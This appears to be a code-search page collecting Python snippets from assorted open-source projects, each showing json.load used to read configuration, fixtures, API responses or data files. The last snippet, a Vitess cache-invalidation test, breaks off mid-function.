コード例 #1
0
    def get_cur(self):
        types = ('alpha','beta','pre','rc',None,'p')
        version = self.base[0]
        if self.opts.version is not None:
            version = self.opts.version

        type = self.base[1]
        if self.opts.type == 'tagged':
            type = 4
            self.opts.hash = None
        elif self.opts.type is not None:
            type = types.index(self.opts.type)

        if self.opts.branch:
            self.branch = self.opts.branch
        elif type < 4:
            self.branch = 'master'
        else:
            self.branch = 'fixes/{0}'.format('.'.join(version.split('.')[0:2]))

        if type != 4:
            if self.opts.hash is None:
                commit = json.load(urllib.urlopen("https://api.github.com/repos/mythtv/MythTV/commits/" + urllib.quote(self.branch, '')))
                self.opts.hash = commit['sha']
                if self.opts.date is None:
                    self.opts.date = process_date(commit['commit']['committer']['date']).strftime('%Y%m%d')
                print "Autoselecting hash: "+self.opts.hash
            elif self.opts.date is None:
                commit = json.load(urllib.urlopen("https://api.github.com/repos/mythtv/MythTV/commits/" + self.opts.hash))
                self.opts.date = process_date(commit['commit']['committer']['date']).strftime('%Y%m%d')

        self.cur = (version, type, self.opts.date)
        if self.opts.verbose: print 'New version set to: {0}-{1}'.format(self.name,self.get_version(self.cur))
コード例 #2
0
 def test_init_manifest_packageid(self):
     comm.setUp()
     os.chdir(comm.XwalkPath)
     comm.clear("org.xwalk.test")
     os.mkdir("org.xwalk.test")
     cmd = (
         comm.HOST_PREFIX
         + comm.PackTools
         + "crosswalk-app manifest "
         + comm.XwalkPath
         + "org.xwalk.test --platforms=android --package-id=org.xwalk.test"
     )
     os.system(cmd)
     with open(comm.ConstPath + "/../tools/org.xwalk.test/manifest.json") as json_file:
         data = json.load(json_file)
     updatecmd = (
         comm.HOST_PREFIX
         + comm.PackTools
         + "crosswalk-app manifest "
         + comm.XwalkPath
         + "org.xwalk.test --platforms=android --package-id=org.test.foo"
     )
     os.system(updatecmd)
     with open(comm.ConstPath + "/../tools/org.xwalk.test/manifest.json") as json_file_update:
         updatedata = json.load(json_file_update)
     comm.clear("org.xwalk.test")
     self.assertEquals(data["xwalk_package_id"].strip(os.linesep), "org.xwalk.test")
     self.assertEquals(updatedata["xwalk_package_id"].strip(os.linesep), "org.test.foo")
コード例 #3
0
ファイル: config.py プロジェクト: WellDone/pymomo
	def __init__(self, name, require_local=False):
		

		localpath = os.path.join(conf_dir, name +'.local.json')
		globalpath = os.path.join(conf_dir, name + '.global.json')

		conf = {}
		localconf = None
		try:
			with open(globalpath, 'r') as f:
				conf = json.load(f)
		except IOError:
			pass #global file can not exist

		try:
			with open(localpath, 'r') as f:
				localconf = json.load(f)
		except IOError:
			if require_local:
				raise ValueError('Local settings file does not exist and is required: %s' % name +'.local.json')

		if localconf is not None:
			merge_dicts(conf, localconf)

		self.conf = conf
コード例 #4
0
 def upload_fixture_image(
     self, fixture_image_path,
     verification_stats_path, verification_result_path, headline='test'
 ):
     with self.app.app_context():
         with open(fixture_image_path, mode='rb') as f:
             file_name = ntpath.basename(fixture_image_path)
             file_type = 'image'
             content_type = '%s/%s' % (file_type, imghdr.what(f))
             file_id = app.media.put(
                 f, filename=file_name,
                 content_type=content_type,
                 resource=get_resource_service('ingest').datasource,
                 metadata={}
             )
             inserted = [file_id]
             renditions = generate_renditions(
                 f, file_id, inserted, file_type, content_type,
                 rendition_config=config.RENDITIONS['picture'],
                 url_for_media=url_for_media
             )
         data = [{
             'headline': headline,
             'slugline': 'rebuild',
             'renditions': renditions,
             'type': 'picture'
         }]
         image_id = get_resource_service('ingest').post(data)
     with open(verification_result_path, 'r') as f:
         self.expected_verification_results.append(json.load(f))
     with open(verification_stats_path, 'r') as f:
         self.expected_verification_stats.append(json.load(f))
     return image_id
コード例 #5
0
    def saveList(self):
        nameOfList = self.LNEDTlistName.text()
        restsOfEachDay = self.collect_restaurants()
        foods = self.collect_foods()
        pyJson = {}
        pyJson["version"]=self.form_data_version
        pyJson["restsOfEachDay"] = restsOfEachDay
        pyJson["foods"] = foods
        # write json file
        json_file = json.dumps(pyJson)
        file = open('./foodlists/' + nameOfList + '.json', 'w')
        file.write(json_file)  #write database to file
        file.close()

        json_file = open('./foodlists/' + nameOfList + ".json", "r")
        json_decoded = json.load(json_file)
        json_file.close()

        datas_file = open('./data/_lisnamedata', "r+")
        datas_decoded = json.load(datas_file)
        if nameOfList.upper() not in (name.upper() for name in datas_decoded["listNames"]):
            datas_decoded["listNames"].append(nameOfList)
            # self.CMBXlists.addItem(nameOfList)
            # self.CMBXeditLists.addItem(nameOfList)

        datas_file.seek(0, 0)  #go to begining of file
        datas_file.write(json.dumps(datas_decoded))
        datas_file.close()
        self.fill_list_of_listname()
        self.showInfoMessage(u" لیست جدید",nameOfList+u" ذخیره شد ")
コード例 #6
0
ファイル: rtk_trans.py プロジェクト: bssthu/rtk_trans
    def load_config(self):
        """载入配置文件

        先读入 conf/config.json 中的配置,再读入 conf/ 中其他 json 文件里的 entry
        """
        config_dir = os.path.join(sys.path[0], 'conf')
        configs = {}
        # main config
        config_file_name = os.path.join(config_dir, 'config.json')
        try:
            with open(config_file_name) as config_fp:
                configs = json.load(config_fp)
        except Exception as e:
            log.error('main: failed to load config from conf/config.json: %s' % e)
        if 'entry' not in configs.keys():
            configs['entry'] = {}

        # other entries
        for dir_path, dir_names, file_names in os.walk(config_dir):
            for file_name in file_names:
                if file_name != 'config.json' and file_name.endswith('.json'):
                    # load sub config
                    config_file_name = os.path.join(config_dir, file_name)
                    try:
                        with open(config_file_name) as config_fp:
                            sub_configs = json.load(config_fp)
                        # insert into main config
                        for name, config in sorted(sub_configs['entry'].items()):
                            if name not in configs['entry'].keys():
                                configs['entry'][name] = config
                    except Exception as e:
                        log.error('main: failed to load config from conf/%s: %s' % (file_name, e))

        return configs
コード例 #7
0
def get_proportional_hash_area(period):
	""" 	Takes in periods accepted by P2Pool - hour, day, week, month or year,
		then gets hash_data from the server running on localhost, parses it, 
		and calculates each miner's hash power against the total during that time. 
	"""
	import urllib2, json
	path1 = 'http://localhost:9332/web/graph_data/miner_hash_rates/last_'+period
	result1 = json.load(urllib2.urlopen(path1))
	path2 = 'http://localhost:9332/web/graph_data/miner_dead_hash_rates/last_'+period
	result2 = json.load(urllib2.urlopen(path2))
	
	hash_areas = {}
	total_hash_area = 0
	for row in result1:
		for address in row[1]:
			try:
				hash_areas[address] += row[1][address] * row[2]
			except KeyError:
				hash_areas[address] = row[1][address] * row[2]
			finally:
				total_hash_area += row[1][address] * row[2]
	
	for row in result2:
		for address in row[1]:
			hash_areas[address] -= row[1][address]*row[2]
			total_hash_area -= row[1][address] * row[2]

	proportions = {}	
	for address in hash_areas.keys():
		proportions[address] = hash_areas[address] / total_hash_area
		hash_areas[address] /= 1000000000000000
	
	return hash_areas, proportions
コード例 #8
0
ファイル: views.py プロジェクト: LinDA-tools/LindaWorkbench
def install_vocabularies():
    Vocabulary.objects.all().delete()
    VocabularyClass.objects.all().delete()
    VocabularyProperty.objects.all().delete()

    # load vocabularies
    vocabularies_fp = open(os.path.join(os.path.dirname(__file__), 'data/vocabularies.json'))
    data = json.load(vocabularies_fp)
    n_of_vocabularies = 0
    with transaction.atomic():  # atomic transactions vastly improve performence
        for v in data:
            vocabulary = Vocabulary.objects.create(pk=v['pk'], category=v['fields']['category'],
                                                   version=v['fields']['version'], votes=v['fields']['votes'],
                                                   originalUrl=v['fields']['originalUrl'],
                                                   description=v['fields']['description'], title=v['fields']['title'],
                                                   downloads=v['fields']['downloads'],
                                                   lodRanking=v['fields']['lodRanking'],
                                                   preferredNamespacePrefix=v['fields']['preferredNamespacePrefix'],
                                                   datePublished=v['fields']['datePublished'],
                                                   downloadUrl=v['fields']['downloadUrl'], score=v['fields']['score'],
                                                   uploader=User.objects.get(pk=v['fields']['uploader']),
                                                   dateModified=v['fields']['dateModified'],
                                                   dateCreated=v['fields']['dateCreated'],
                                                   preferredNamespaceUri=v['fields']['preferredNamespaceUri'],
                                                   example=v['fields']['example'], prevent_default_make=True)
            n_of_vocabularies += 1
            vocabulary.prevent_default_make = False  # reset to false so it can be updated
    vocabularies_fp.close()

    # load classes
    classes_fp = open(os.path.join(os.path.dirname(__file__), 'data/classes.json'))
    data = json.load(classes_fp)
    n_of_classes = 0
    with transaction.atomic():
        for c in data:
            VocabularyClass.objects.create(pk=c['pk'], description=c['fields']['description'],
                                           uri=c['fields']['uri'], label=c['fields']['label'],
                                           vocabulary=Vocabulary.objects.get(pk=c['fields']['vocabulary']))
            n_of_classes += 1
    classes_fp.close()

    # load properties
    properties_fp = open(os.path.join(os.path.dirname(__file__), 'data/properties.json'))
    data = json.load(properties_fp)
    n_of_properties = 0
    with transaction.atomic():
        for p in data:
            VocabularyProperty.objects.create(pk=p['pk'], description=p['fields']['description'],
                                              uri=p['fields']['uri'],
                                              vocabulary=Vocabulary.objects.get(pk=p['fields']['vocabulary']),
                                              label=p['fields']['label'], domain=p['fields']['domain'],
                                              range=p['fields']['range'], parent_uri=p['fields']['parent_uri'])
            n_of_properties += 1
    properties_fp.close()

    return HttpResponse(json.dumps({
        'n_of_vocabularies': n_of_vocabularies,
        'n_of_classes': n_of_classes,
        'n_of_properties': n_of_properties
    }), status=200, content_type="application/json")
def main(we_file, w2i_file, sen):
    cc_matrix = "./input/cc_matrix.npy"
    if not os.path.isfile(w2i_file):
        sentences, word2idx = get_reuters_data(n_vocab=2000)
        with open(w2i_file, 'w') as f:
            json.dump(word2idx, f)
        with open(sen, 'w') as f:
            json.dump(sentences, f)
    else:
        with open(w2i_file) as data_file:    
            word2idx = json.load(data_file)
        with open(sen) as data_file:    
            sentences = json.load(data_file)

    V = len(word2idx)
    model = Glove(50, V, 10)
    # model.fit(sentences, cc_matrix=cc_matrix, epochs=20) # ALS
    model.fit(
        sentences,
        cc_matrix=cc_matrix,
        learning_rate=3*10e-5,
        reg=0.01,
        epochs=2000,
        gd=True,
        use_theano=True
    ) # gradient descent
    model.save(we_file)
コード例 #10
0
def ReadJson(config_file):
    """Read in a JSON configuration file and return the corresponding dicts.

    A JSON file only defines a single dict.  However to be parallel to the functionality of
    ReadYaml, the output is a list with a single item, which is the dict defined by the JSON file.

    @param config_file      The name of the configuration file to read.

    @returns [config_dict]
    """
    import json

    with open(config_file) as f:
        try:
            # cf. http://stackoverflow.com/questions/6921699/can-i-get-json-to-load-into-an-ordereddict-in-python
            config = json.load(f, object_pairs_hook=OrderedDict)
        except TypeError:  # pragma: no cover
            # for python2.6, json doesn't come with the object_pairs_hook, so
            # try using simplejson, and if that doesn't work, just use a regular dict.
            # Also, it seems that if the above line raises an exception, the file handle
            # is not left at the beginning, so seek back to 0.
            f.seek(0)
            try:
                import simplejson
                config = simplejson.load(f, object_pairs_hook=OrderedDict)
            except ImportError:
                config = json.load(f)

    # JSON files only ever define a single job, but we need to return a list with this one item.
    return [config]
コード例 #11
0
ファイル: views.py プロジェクト: LinDA-tools/LindaWorkbench
def install_analytics():
    Category.objects.all().delete()
    Algorithm.objects.all().delete()

    # load categories
    categories_fp = open(os.path.join(os.path.dirname(__file__), 'data/categories.json'))
    data = json.load(categories_fp)
    n_of_categories = 0
    for c in data:
        Category.objects.create(pk=c['pk'], name=c['fields']['name'],
                                description=c['fields']['description'])
        n_of_categories += 1

    categories_fp.close()

    # load algorithms
    algorithms_fp = open(os.path.join(os.path.dirname(__file__), 'data/algorithms.json'))
    data = json.load(algorithms_fp)
    n_of_algorithms = 0
    for a in data:
        Algorithm.objects.create(pk=a['pk'],
                                 category=Category.objects.get(pk=a['fields']['category']),
                                 name=a['fields']['name'], description=a['fields']['description'])
        n_of_algorithms += 1

    algorithms_fp.close()

    return HttpResponse(json.dumps({
        'n_of_categories': n_of_categories,
        'n_of_algorithms': n_of_algorithms
        }), status=200, content_type="application/json")
コード例 #12
0
ファイル: views.py プロジェクト: ychsieh/Actually
def getcommits_from_project(project):
    global access_token
    url1 = 'https://api.github.com/user'
    request1=Request(url1)
    request1.add_header('Authorization', 'token %s' % access_token)
    response1 = urlopen(request1)
    result1 = json.load(response1)
    person = result1['login']
    repo_info=['Fasta','js2839']
    owner= repo_info[1]
    repo = repo_info[0]
    url = 'https://api.github.com/repos/'+owner+'/'+repo+'/commits'
    data=[]
    request = Request(url)
    request.add_header('Authorization', 'token %s' % access_token)
    response = urlopen(request)
    result = json.load(response)
    for i in range(len(result)):
        print 'result0'
        data.append([result[i]['commit']['message'], result[i]['commit']['author']['name'], result[i]['commit']['author']['date']])
        print data[i]
    for com in data:
        (per,sub_name)=getPercentage(com[0])
        err = save_to_db( per, sub_name, com[1], project, com[2])
    return 
コード例 #13
0
ファイル: streams.py プロジェクト: poseidon1214/PyFunctional
    def json(self, json_file):
        """
        Reads and parses the input of a json file handler or file.

        Json files are parsed differently depending on if the root is a dictionary or an array.

        1) If the json's root is a dictionary, these are parsed into a sequence of (Key, Value)
        pairs

        2) If the json's root is an array, these are parsed into a sequence
        of entries

        >>> seq.json('examples/users.json').first()
        [u'sarah', {u'date_created': u'08/08', u'news_email': True, u'email': u'*****@*****.**'}]

        :param json_file: path or file containing json content
        :return: Sequence wrapping jsonl file
        """
        if isinstance(json_file, str):
            file_open = get_read_function(json_file, self.disable_compression)
            input_file = file_open(json_file)
            json_input = jsonapi.load(input_file)
        elif hasattr(json_file, 'read'):
            json_input = jsonapi.load(json_file)
        else:
            raise ValueError('json_file must be a file path or implement the iterator interface')

        if isinstance(json_input, list):
            return self(json_input)
        else:
            return self(six.viewitems(json_input))
コード例 #14
0
def populate_recipe_tables():  # pylint: disable=too-many-locals
    """Populate tables about recipes."""
    # Get all plans and recipes
    with open(JsonRes.craftplan, 'r', encoding='UTF-8') as f_recipes:
        recipes = json.load(f_recipes)

    with open(JsonRes.plans_en, 'r', encoding='UTF-8') as f_plans:
        plans = flatten_nested_dict(json.load(f_plans))

    for recipe, component in recipes.items():
        # filter matis affiliadted recipe to get higher quality recipe
        if recipe[:3] == 'bcf':
            recipe = recipe.replace('bcf', 'bcc')

        # Filter recipes to keep only those are not affiliated to a faction
        if recipe[:3] != 'bcc' and recipe[:4] != 'bcmj':
            continue

        quality = get_plan_quality(recipe)

        try:
            # Split the recipe code to separate the quality code from the rest
            # pylint: disable=unpacking-non-sequence
            keypath, infos = get_plan(plans, recipe.split('_')[0])
        except TypeError:
            print(
                "The recipe code: {} was not found in the ".format(recipe) +
                "flatten dict of plans.",
                file=sys.stderr
            )
            continue

        *categories, recipe_name = keypath.split("|")

        if "ammo" in recipe_name:
            # recipe_name += " of " + categories[-1].lower()
            recipe_name = categories[-1] + " " + recipe_name.lower()
            categories[-1] = None

        if categories[0] == "Weapon":
            if "One" in categories[-1]:
                categories[-1] = 1
            elif "Two" in categories[-1] or "hand" in categories[-1]:
                categories[-1] = 2
            else:
                categories[-1] = None

        recipe_cat_id = insert_recipe_category(*categories)

        recipe_id = insert_recipe(
            recipe_name, quality, infos['icon'] + '.png', recipe_cat_id
        )

        # Recipe already exists
        if recipe_id == 'stop':
            continue

        # Loop over plan's component
        for comp, amount in component['mpft'].items():
            insert_recipe_component(recipe_id, comp, amount)
コード例 #15
0
 def getJSON (self, name):
   file_name = os.path.join(os.path.dirname(os.path.realpath(__file__)), "..", "data", name+".json")
   try:
     self.json_data  = json.load(open(file_name, 'r'))
   except IOError:
     subprocess.call (["./get_residue.sh", file_name], shell=True)
     self.json_data  = json.load(open(file_name, 'r'))
コード例 #16
0
ファイル: npm.py プロジェクト: michaelgwood/poky
    def download(self, ud, d):
        """Fetch url"""
        jsondepobj = {}
        shrinkobj = {}
        lockdown = {}

        if not os.listdir(ud.pkgdatadir) and os.path.exists(ud.fullmirror):
            dest = d.getVar("DL_DIR", True)
            bb.utils.mkdirhier(dest)
            runfetchcmd("tar -xJf %s" % (ud.fullmirror), d, workdir=dest)
            return

        shwrf = d.getVar('NPM_SHRINKWRAP', True)
        logger.debug(2, "NPM shrinkwrap file is %s" % shwrf)
        try:
            with open(shwrf) as datafile:
                shrinkobj = json.load(datafile)
        except:
            logger.warning('Missing shrinkwrap file in NPM_SHRINKWRAP for %s, this will lead to unreliable builds!' % ud.pkgname)
        lckdf = d.getVar('NPM_LOCKDOWN', True)
        logger.debug(2, "NPM lockdown file is %s" % lckdf)
        try:
            with open(lckdf) as datafile:
                lockdown = json.load(datafile)
        except:
            logger.warning('Missing lockdown file in NPM_LOCKDOWN for %s, this will lead to unreproducible builds!' % ud.pkgname)

        if ('name' not in shrinkobj):
            self._getdependencies(ud.pkgname, jsondepobj, ud.version, d, ud)
        else:
            self._getshrinkeddependencies(ud.pkgname, shrinkobj, ud.version, d, ud, lockdown, jsondepobj)

        with open(ud.localpath, 'w') as outfile:
            json.dump(jsondepobj, outfile)
コード例 #17
0
def merge_data_from_crawl(): #To refactor far too long
    category_file = sorted(os.listdir(os.getcwd()+"/data/data_from_crawl"))
    movies_category = [file_name for file_name in category_file if not any(c.isdigit() for c in file_name)]
    for category in movies_category:
        if category.endswith('.json'):
            category = category[:-5]
        if category.endswith('die'):
            movies_with_part = [file_name for file_name in category_file if (len(file_name) < 30 and category in file_name)]
        else:
            movies_with_part = [file_name for file_name in category_file if category in file_name]
        if len(movies_with_part) > 1:
            all_part_data = {}
            for movies_part in movies_with_part:
                with open('data/data_from_crawl/' + movies_part) as part:
                    data = json.load(part)
                for movie_title, movie_data in data.iteritems():
                    all_part_data[movie_title] = movie_data
            with io.open("data/data_to_use/" + movies_with_part[0] , "w+", encoding='utf8') as all_part:
                output = json.dumps(all_part_data, ensure_ascii=False, encoding='utf8')
                all_part.write(unicode(output))
        if len(movies_with_part) == 1 and  movies_with_part[0][0] != '.':
            with open('data/data_from_crawl/' + movies_with_part[0]) as part:
                data = json.load(part)
            with io.open("data/data_to_use/" + movies_with_part[0] , "w+", encoding='utf8') as all_part:
                output = json.dumps(data, ensure_ascii=False, encoding='utf8')
                all_part.write(unicode(output))
コード例 #18
0
ファイル: test_views.py プロジェクト: texastribune/wjordpress
    def test_post_works(self):
        site = WPSiteFactory(url='http://www.foo.com/')
        # assert the post we're about to make doesn't exist
        self.assertFalse(WPPost.objects.filter(wp=site, id=521).exists())
        # sample POST based on a RequestBin[requestb.in] test
        request = self.factory.post('/foo/', {
            'hook': 'save_post',
            'ID': '521',
            'guid': 'http://www.foo.com/?p=521',
        })
        data = json.load(open(os.path.join(BASE_DIR, 'support', 'posts_521.json')))
        with mock.patch('wjordpress.models.WPApi') as MockApi:
            # got to be a better syntax for this
            MockApi.return_value = mock.MagicMock(**{'posts.return_value': data})
            response = self.view.post(request, site.pk)
        self.assertEqual(response.status_code, 200)
        # assert this post now exists
        self.assertTrue(WPPost.objects.filter(wp=site, id=521).exists())
        post = WPPost.objects.filter(wp=site, id=521).get()
        self.assertTrue(post.author)

        # Contrived example: author changes locally, will it get set again?
        post.author = None
        post.save()

        data = json.load(open(os.path.join(BASE_DIR, 'support', 'posts_521.json')))
        with mock.patch('wjordpress.models.WPApi') as MockApi:
            # got to be a better syntax for this
            MockApi.return_value = mock.MagicMock(**{'posts.return_value': data})
            response = self.view.post(request, site.pk)
        # sanity check
        self.assertEqual(response.status_code, 200)
        post = WPPost.objects.filter(wp=site, id=521).get()
        # assert foreign relations were created
        self.assertTrue(post.author)
コード例 #19
0
ファイル: generator.py プロジェクト: 0xmohit/rust
def main():
    args = parse_args()
    ins = args.in_
    out = args.out
    out_format = FORMATS[args.format]
    info = args.info
    one_file_no_info = False
    if len(ins) > 1 and info is None:
        print('error: cannot have multiple inputs without an info header.', file=sys.stderr)
        sys.exit(1)

    elif info is None:
        info = ins[0]
        one_file_no_info = True
    info_json = json.load(info)
    platform = PlatformInfo(info_json)

    print(out_format.open(platform), file=out)

    for in_ in ins:

        if one_file_no_info:
            data = info_json
        else:
            data = json.load(in_)
            data.update(info_json)

        intrinsics = IntrinsicSet(platform, data)
        for intr in intrinsics.intrinsics():
            for mono in intr.monomorphise():
                print(out_format.render(mono), file=out)

    print(out_format.close(), file=out)
コード例 #20
0
def crash_recover():
	global crash_obj
	tidy_reset=0
	try:
		with open(crash_file):
			print "recovering from %s" % crash_file
			crash_json=open(crash_file)
			crash_progress=json.load(crash_json)
			tidy_reset=1
			pass
	except IOError:	
		print "no crash log found.  Executing as normal"
		
		pass
	
	if tidy_reset:
		print "\tRestoring progress"
		crash_json = open(crash_file)
		crash_obj=json.load(crash_json)
	else:
		validate_delete = raw_input("Delete all entries to %s in %s.%s?  (Y/N)" % (start_date,db_schema,db_name))
		if validate_delete.upper() == 'Y':
			db_cursor.execute("DELETE FROM %s WHERE date>='%s'" % (db_name,start_date))
			db.commit()
			print "\tCleaning up ALL entries to %s" % start_date
		else:
			print "\tWARNING: values may be wrong without scrubbing duplicates"
			#Initialize crash_obj
		crash_obj={}
		crash_obj["parsed_data"]={}
		crash_obj["progress"]={}
コード例 #21
0
def do_environment_model_edit(mc, args):
    """Edit an environment's object model."""
    jp_obj = None
    if not args.filename:
        jp_obj = json.load(sys.stdin)
    else:
        with open(args.filename) as fpatch:
            jp_obj = json.load(fpatch)

    if not isinstance(jp_obj, list):
        raise exceptions.CommandError('JSON-patch must be a list of changes')
    for change in jp_obj:
        if 'op' not in change or 'path' not in change:
            raise exceptions.CommandError('Every change in JSON-patch must '
                                          'contain "op" and "path" keys')
        op = change['op']
        if op not in ['add', 'replace', 'remove']:
            raise exceptions.CommandError('The value of "op" item must be '
                                          '"add", "replace" or "remove", '
                                          'got {0}'.format(op))
        if op != 'remove' and 'value' not in change:
            raise exceptions.CommandError('"add" or "replace" change in '
                                          'JSON-patch must contain "value" '
                                          'key')
    session_id = args.session_id
    new_model = mc.environments.update_model(args.id, jp_obj, session_id)
    print(utils.json_formatter(new_model))
コード例 #22
0
 def test_stop_replication(self):
   utils.debug("===========test_stop_replication=========")
   utils.run_vtctl('ChangeSlaveType test_nj-0000062345 replica')
   time.sleep(10)
   perform_insert(100)
   master_position = utils.mysql_query(62344, 'vt_test_keyspace', 'show master status')
   #The sleep is needed here, so the invalidator can catch up and the number can be tested.
   replica_tablet.mquery('vt_test_keyspace', "select MASTER_POS_WAIT('%s', %d)" % (master_position[0][0], master_position[0][1]), 5)
   time.sleep(5)
   inv_count1 = framework.MultiDict(json.load(urllib2.urlopen("http://%s/debug/table_stats" % replica_host)))['Totals']['Invalidations']
   replica_tablet.mquery('vt_test_keyspace', "stop slave")
   perform_insert(100)
   # EOF is returned after 30s, sleeping a bit more to ensure we catch the EOF
   # and can test replication stop effectively.
   time.sleep(35)
   replica_tablet.mquery('vt_test_keyspace', "start slave")
   master_position = utils.mysql_query(62344, 'vt_test_keyspace', 'show master status')
   #The sleep is needed here, so the invalidator can catch up and the number can be tested.
   replica_tablet.mquery('vt_test_keyspace', "select MASTER_POS_WAIT('%s', %d)" % (master_position[0][0], master_position[0][1]), 5)
   time.sleep(10)
   invalidatorStats = framework.MultiDict(json.load(urllib2.urlopen("http://%s/debug/vars" % replica_host)))['CacheInvalidationProcessor']
   utils.debug("invalidatorStats %s" % invalidatorStats)
   inv_count2 = framework.MultiDict(json.load(urllib2.urlopen("http://%s/debug/table_stats" % replica_host)))['Totals']['Invalidations']
   utils.debug("invalidator count1 %d count2 %d" % (inv_count1, inv_count2))
   self.assertEqual(invalidatorStats["States"]["Current"], "Enabled", "Row-cache invalidator should be enabled")
   self.assertTrue(inv_count2 - inv_count1 > 0, "invalidator was able to restart after a small pause in replication")
コード例 #23
0
ファイル: __main__.py プロジェクト: TrainingB/RotomDex
def load_config():
    global config
    global pkmn_info
    global type_chart
    global type_list
    global raid_info
    global egg_timer
    global raid_timer
    global icon_list
    global GOOGLE_API_KEY
    global GOOGLE_MAPS_URL

    # Load configuration
    with open("config.json", "r") as fd:
        config = json.load(fd)

    # Set up message catalog access
    # language = gettext.translation('clembot', localedir='locale', languages="en")
    # language.install()
    # pokemon_language = [config['pokemon-language']]
    # pokemon_path_source = os.path.join('locale', '{0}', 'pkmn.json').format(config['pokemon-language'])

    # Load Pokemon list and raid info
    with open(os.path.join('data', 'pkmn.json'), "r") as fd:
        pkmn_info = json.load(fd)

    with open(os.path.join('data', "icon.json"), "r") as fd:
        icon_list = json.load(fd)

    # Set spelling dictionary to our list of Pokemon
    spelling.set_dictionary(pkmn_info['pokemon_list'])
コード例 #24
0
    def load_data(self):
        logging.info("Starting data loads.")
        self.data = json.load(open('data/features.json'))
        helpers.normalize_features(self.data)

        self.dev_movie_ids = set(json.load(open('data/dev.json')))
        self.test_movie_ids = set(json.load(open('data/test.json')))

        # self.data = dict((k,self.data[unicode(k)]) for k in (list(self.dev_movie_ids)[0:900] + list(self.test_movie_ids)[0:100]))

        # Transforms the data so they can be used by pybrain.
        logging.info("Loading feature keys...")
        feature_keys = set()
        for movie_id, features in self.data.iteritems():
            feature_keys.update(features['features'].keys())

        self.feature_keys = list(feature_keys)
        logging.info("Feature keys loaded.")

        logging.info("Vectorizing features...")
        self.dev_features = []
        self.dev_scores = []
        self.test_features = []
        self.test_scores = []
        for movie_id, features in self.data.iteritems():
            if int(movie_id) in self.dev_movie_ids:
                features_list = self.dev_features
                scores_list = self.dev_scores
            else:
                features_list = self.test_features
                scores_list = self.test_scores

            features_list.append([features['features'].get(feature_key, 0) for feature_key in self.feature_keys])
            scores_list.append([features['rating']])
        logging.info("Features vectorized.")
コード例 #25
0
 def get_first_image_specific_implementation(self, species, index):
     #returns the url of the first image of the species found in the source
     (return_status, ids) = self.get_ids(species)
     
     if not(return_status):
         self.err_list[index] = (species, ids)
         return
     else:
         id = ids[0]
         url = 'http://eol.org/api/pages/1.0/' + str(id) + '.json?images=10&videos=0&sounds=0&maps=0&text=0&iucn=false&subjects=overview&licenses=all&details=false&common_names='
         
         data_pages = ''
         
         i = 0
         while True:
             try:
                 data_pages = json.load(urllib2.urlopen(url))
                 break
             except URLError:
                 if i < 3:
                     i = i + 1
                 else:
                     self.err_list[index] = (species, constants.CONNECTION_ERROR)
                     return
             except:
                 self.err_list[index] = (species, constants.JSON_ERROR)
                 return
         
         pages_list = data_pages['dataObjects']
         
         if len(pages_list) == 0:
             self.err_list[index] = (species, constants.NO_IMAGES_FOR_SPECIES)
             return
         else:
             object_id = pages_list[0]['dataObjectVersionID']
             url = 'http://eol.org/api/data_objects/1.0/' + str(object_id) + '.json'
             
             image_list = ''
             i = 0
             
             while True:
                 try:
                     image_list = json.load(urllib2.urlopen(url))['dataObjects']
                     break
                 except URLError:
                     if i < 3:
                         i = i + 1
                     else:
                         self.err_list[index] = (species, constants.CONNECTION_ERROR)
                         return
                 except:
                     self.err_list[index] = (species, constants.JSON_ERROR)
                     return
             
             if len(image_list) == 0:
                 self.err_list[index] = (species, constants.NO_IMAGES_FOR_SPECIES)
                 return
             else:
                 self.img_list[index] = (species, image_list[0]['mediaURL'])
                 return
コード例 #26
0
ファイル: utils.py プロジェクト: mralexgray/Sublime-Text-3
def get_jscs_options(path):
    option_sets = []

    jscsrc_path = findup(path, '.jscsrc')
    if os.path.isfile(jscsrc_path):
        jscsrc = lazy_parse_comment_json(
            open(jscsrc_path, 'r', encoding='UTF-8'))
        option_sets.append((jscsrc_path, jscsrc))

    jscs_json_path = findup(path, '.jscs.json')
    if os.path.isfile(jscs_json_path):
        jscs_json = json.load(open(jscs_json_path, 'r', encoding='UTF-8'))
        option_sets.append((jscs_json_path, jscs_json))

    package_path = findup(path, 'package.json')
    if os.path.isfile(package_path):
        package = json.load(open(package_path, 'r', encoding='UTF-8'))
        if 'jscsConfig' in package:
            option_sets.append((package_path, package['jscsConfig']))

    # Sort sets by dirname length
    option_sets.sort(key=lambda x: len(os.path.dirname(x[0])))

    # Merge options together
    options = dict()
    for path, option_set in option_sets:
        options.update(option_set)

    return options
コード例 #27
0
def dynamic_params_from_model(model):
    '''Get user-submitted dynamic parameters from a DynamicSaveInputs model'''
    ser_model = serializers.serialize('json', [model])
    user_inputs = json.loads(ser_model)
    inputs = user_inputs[0]['fields']

    # Read user-modifiable parameters list from file
    usermods_path = os.path.join(os.path.split(__file__)[0],
                                 "ogusa_user_modifiable.json")
    with open(usermods_path, "r") as f:
         ump = json.load(f)
         USER_MODIFIABLE_PARAMS = ump["USER_MODIFIABLE_PARAMS"]

    # Read ogusa parameters list from file
    ogusa_params_path = os.path.join(os.path.split(__file__)[0],
                                 "ogusa_parameters.json")
    with open(ogusa_params_path, "r") as f:
         OGUSA_PARAMS = json.load(f)

    params = {k:inputs[k] for k in USER_MODIFIABLE_PARAMS}

    for k, v in params.items():
        if v == '':
            params[k] = str(OGUSA_PARAMS[k]['value'])

    return params
コード例 #28
0
  def test_cache_invalidation(self):
    utils.debug("===========test_cache_invalidation=========")
    master_position = utils.mysql_query(62344, 'vt_test_keyspace', 'show master status')
    #The sleep is needed here, so the invalidator can catch up and the number can be tested.
    replica_tablet.mquery('vt_test_keyspace', "select MASTER_POS_WAIT('%s', %d)" % (master_position[0][0], master_position[0][1]), 5)
    time.sleep(5)
    invalidations = framework.MultiDict(json.load(urllib2.urlopen("http://%s/debug/table_stats" % replica_host)))['Totals']['Invalidations']
    invalidatorStats = framework.MultiDict(json.load(urllib2.urlopen("http://%s/debug/vars" % replica_host)))['CacheInvalidationProcessor']
    utils.debug("Invalidations %d InvalidatorStats %s" % (invalidations, invalidatorStats))
    self.assertTrue(invalidations > 0, "Invalidations are flowing through.")

    res = replica_tablet.mquery('vt_test_keyspace', "select min(id) from vt_insert_test")
    self.assertNotEqual(res[0][0], None, "Cannot proceed, no rows in vt_insert_test")
    id = int(res[0][0])
    stats_dict = framework.MultiDict(json.load(urllib2.urlopen("http://%s/debug/table_stats" % replica_host)))['vt_insert_test']
    utils.debug("vt_insert_test stats %s" % stats_dict)
    misses = stats_dict['Misses']
    hits = stats_dict["Hits"]
    replica_tablet.vquery("select * from vt_insert_test where id=%d" % (id), path='test_keyspace/0')
